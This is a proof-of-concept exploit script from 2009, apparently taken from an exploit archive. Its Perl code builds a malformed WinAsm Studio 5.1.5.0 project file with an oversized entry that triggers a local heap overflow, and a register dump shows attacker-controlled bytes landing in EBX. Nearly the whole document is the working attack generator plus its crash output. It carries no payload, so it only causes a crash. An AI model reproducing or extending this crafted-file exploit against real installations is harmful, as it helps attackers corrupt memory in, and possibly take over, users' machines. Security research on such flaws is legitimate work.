# Title : WinAsm Studio 5.1.5.0 Local Heap Overflow PoC
# Published : 2009-03-16
# Author : Stack
# Previous Title : Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash
# Next Title : Gretech GOM Encoder 1.0.0.11 (Subtitle File) Buffer Overflow PoC
# WinAsm Studio 5.1.5.0 Local Heap Overflow Poc
# By Mountassif Moad
# D0wnload : http://www.winasm.net/index.php?ind=downloads&op=download_file&ide=182&file=WinAsm515Full.zip
# Greatz : Simo-Soft - Skd - fl0 fl0w - Str0ke & By By milw0rm :d
#
# Registers
# EAX 00000001
# ECX 00000001
# EDX 0013F814
# EBX 42424242 ( EBX overwritten :d )
# ESP 0013FBDC
# EBP 0013FE3C
# ESI 0013FBF7
# EDI 0013FD2F ASCII "BBBBBBBBBB" (next chars in EDI :d )
# EIP 0040A927 WinAsm.0040A927
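# Builds the malformed WinAsm Studio project file (.wap) this PoC feeds to the
# IDE and writes it to STDOUT.
#
# The listing as published had its backslashes stripped ("x5B" for "\x5B",
# "n" for "\n"), so it printed the literal escape text instead of the bytes.
# The hex is restored here as the plain ASCII it decoded to, with "\r" (0x0D)
# between records.
use strict;
use warnings;

# Layout of the over-long "1=" entry in the [FILES] section.  Per the register
# dump in the header, the four "B" bytes end up in EBX and the "C" run is what
# EDI points at after the crash; the "A" run is the padding before them.
my $PAD_LEN  = 227;   # "A" run
my $EBX_LEN  = 4;     # "B" run, seen in EBX in the register dump
my $TAIL_LEN = 20;    # "C" run, seen at EDI in the register dump

# Returns the crafted .wap contents as one string: an oversized "1=" entry
# under [FILES], followed by otherwise ordinary [PROJECT] and [MAKE]
# sections.  Records are separated by "\r" with no trailing separator,
# matching the original byte string exactly (457 bytes).
sub build_wap_contents {
    my $file_entry = ('A' x $PAD_LEN) . ('B' x $EBX_LEN) . ('C' x $TAIL_LEN);
    my @records = (
        '[FILES]',
        "1=$file_entry",
        '[PROJECT]',
        'Type=',
        'ReleaseCommandLine=',
        'DebugCommandLine=',
        'AutoIncFileVersion=0',
        'RCSilent=0',
        'PellesTools=0',
        '[MAKE]',
        'ActiveBuild=0',
        'CompileRC=',
        'RCToObj=',
        'Assemble=/c',
        'Link=',
        'Out=',
        'DebAssemble=/c',
        'DebLink=',
        'DebOut=',
    );
    return join "\r", @records;
}

# Only emit output when run as a script, so the file can be require'd
# (for instance by a test) without printing anything.
unless (caller) {
    # Raw bytes out: keep "\r" untouched and avoid any I/O layer translation.
    binmode STDOUT;
    print STDOUT build_wap_contents();

    # The usage banner goes to STDERR so that "perl $0 >>Exploit.wap" captures
    # only the project file.  The original printed it to STDOUT, which appended
    # the banner text to the generated file.
    print STDERR "\n";
    print STDERR " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
    print STDERR " +++ WinAsm Studio 5.1.5.0 Local Heap Overflow Poc +++\n";
    print STDERR " +++ Written By Stack +++\n";
    print STDERR " +++ Usage Ex.: perl $0 >>Exploit.wap +++\n";
    print STDERR " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
    exit;
}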
# www.Syue.com [2009-03-16]